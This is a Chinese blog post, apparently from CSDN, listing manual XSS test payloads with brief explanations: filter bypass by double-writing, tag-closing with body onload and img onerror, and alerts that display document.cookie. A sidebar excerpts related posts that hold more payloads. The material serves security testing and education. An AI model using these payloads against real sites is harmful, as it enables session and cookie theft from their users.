XSS 常用的手动测试方法

最新推荐文章于 2023-09-28 09:34:26 发布
最新推荐文章于 2023-09-28 09:34:26 发布
阅读量203 收藏
点赞数
分类专栏: 网路安全 文章标签: xss 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53693367/article/details/132719771
版权 
<scri<script>pt>alert(1)</script>

  双写/大小写绕过(大写的话就改成大写的)

#</option></select><BODY ONLOAD=alert(document.cookie)>

  前面先进行闭<option>标签,并在<body>体中使用onload函数他是在加载白名单对象的时候,进行调用alert方法弹出cookie信息,最前面加#避免数据后面的payload传到服务器,就是为了让他的数据能够在浏览器页面进行显示

<script>alert(/xss/)</script>

  js弹窗

</select><img src=1 onerror=alert(/xss/)></option>

事件型参数绕过,这个的意思就是为了闭合<select>,<option>标签,并插入一个没有的图片,使它出错然后执行alert弹窗命令

文章永久免费只为良心
关注
专栏目录
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)
Until_U的博客
07-06 5785
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3216
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
简单的XSS手动测试
weixin_33850890的博客
09-21 269
好吧,我也是初学者,写这个随笔,主要也是为了记录,自学到的点。 简单的案例,见http://www.cnblogs.com/trhimily/p/3898915.html 总结一下主要的点: 1. url上参数使用脚本(get); 2. post参数使用脚本(post): 这里要注意,不是传参就可以,还需要 1)传参数 2)数据库存储 3)显示:调用...
XSS漏洞手工检测
zzkkoo8的博客
12-15 6771
xss漏洞手工检测xss漏洞手工检测 1基本检测 2绕过技巧 2017年12月14日 17:44:57 1、基本检测'"<>&空格 \\看有没有逃逸 常用语句 "/><script>alert(document.cookie)</script><!-- <script>alert(document.cookie)</script><!-- "onclick="alert(document.coo
XSS测试
酷狗直播-锦凡歆的博客
05-23 519
跨站脚本漏洞是Web应用程序在将数据输出到网页的时候存在问题,导致恶意攻击者 可以往Web页面里插入恶意JavaScript、HTML代码,并将构造的恶意数据显示在页面的漏 洞中。攻击者一般利用此漏洞窃取或操纵客户会话和 Cookie,用于模仿合法用户,从而 使攻击者以该用户身份查看或变更用户记录以及执行事务。 跨站一般情况下主要分为存储型跨站、反射型跨站、DOM型跨站。存储型跨站脚本...
xss妙用,快速测试xss漏洞。
热门推荐
椰树ii
05-24 1万+
#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site Scripting) Prevention Cheat Shee
手工XSS(未完)
LYSM
05-17 245
绕过 ’ 和 " String.fromCharCode() 绕过 < " onclick=" alert(1) 事件类型只能为 Form 事件 绕过 > " accesskey="X" onclick="alert(1)" 绕过 script 关键字 <img src='unknown' onerror='alert(1)'> ...
XSS漏洞的检测与利用方法
什么是XSS漏洞 ## 1.1 XSS漏洞的定义和原理 XSS(Cross-Site Scripting)跨站脚本攻击,是一种常见的Web安全漏洞。它利用网页未能对用户输入数据进行充分过滤和验证的缺陷,导致攻击者可以向目标用户的浏览器中...
web安全——手动测试
11-25
安全测试常用工具扫描进行,本次讲解内容是针对手动安全测试,包括常见关注点,三大漏洞:sql注入,xss攻击,文件上传漏洞等内容,可以方便测试人员在平时测试时就能手动测试安全问题
机器学习实现web攻击检测——XSS、SQL注入、Webshell检测.zip
最新发布
05-06
定期更新模型以适应新的攻击手段,同时结合规则基础的检测方法,可以提高整体的防护效果。 总结来说,机器学习在Web攻击检测中的应用为网络安全提供了一种强大的工具,能够自动识别和防御XSS、SQL注入和Webshell等...
XSS测试用例
q908544703的博客
05-28 2094
下载原件地址:链接:https://pan.baidu.com/s/1HQu4daTdxfgTDWAyXUD5lA 提取码:5mw1 在这里插入图片描述
xss测试步骤总结
wutiangui的博客
09-28 1978
先看bp,再看回显,测试常规xss语句,接着看F12上下文,然后是构造闭合,最后是依次测试绕过方法,成功的时候要能得到一个可以复现的url。
XSS靶场练习手工注入(1)
qq_43511094的博客
01-28 4958
XSS手工注入前言靶场:https://xss.haozi.me/#/0x00基础知识test()方法:replace()题目1解题思路结果题目2解题思路结果题目3解题思路结果题目4解题思路结果题目5解题思路结果题目6解题思路结果题目7解题思路结果题目8解题思路结果题目9解题思路结果题目10解题思路结果题目11解题思路结果题目12解题思路结果题目13解题思路结果题目14解题思路结果题目15解题思路结果题目16解题思路结果题目17解题思路结果题目18解题思路结果题目19解题思路结果 前言 这篇一篇用来记录自己
【渗透测试XSS手工挖掘到防御
ssrf
08-05 739
一、概述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容 危害: 盗取管理员cookie XSS蠕虫 挂马(水坑攻击) 键盘记录等等。。。。。。 二、XSS分类 1
XSS手工测试阶段式小结
L1m93的博客
03-29 1984
XSS攻击方式千变万化,越是学习这一块的知识就越感到自己对这一方面知识的匮乏。也如海绵一般,我也渴望汲取更多新的知识。文章仅仅是作为一个阶段式的小结。 反射型XSS 在用户单击时触发,只执行一次。 存在:搜索框,用户登陆口 攻击成本比存储型XSS高。 经过后端,不经过数据库。 数据流向:浏览器》后端》浏览器 存储型XSS 比反射型XSS威胁性高。 存在:留言,评论,博...
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 6013
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
安全测试xss攻击通用测试用例
测试开发
04-12 852
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
XSS常用标签
weixin_47306547的博客
09-17 3383
目录 XSS常用标签 < script> < img > < input > < details> < svg > < select > < iframe > < video> < audio > < body > XSS常用标签 <script> alert("xss"); </script> <img src=1 one...
Web安全测试实战:常用方法解析
以下是一些常用的Web安全测试方法: 1. **漏洞扫描**:使用自动化工具扫描Web应用程序,查找常见的安全漏洞,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)、文件包含漏洞等。这些工具能够快速发现潜在的风险...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

文章永久免费只为良心

你的鼓励是我的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值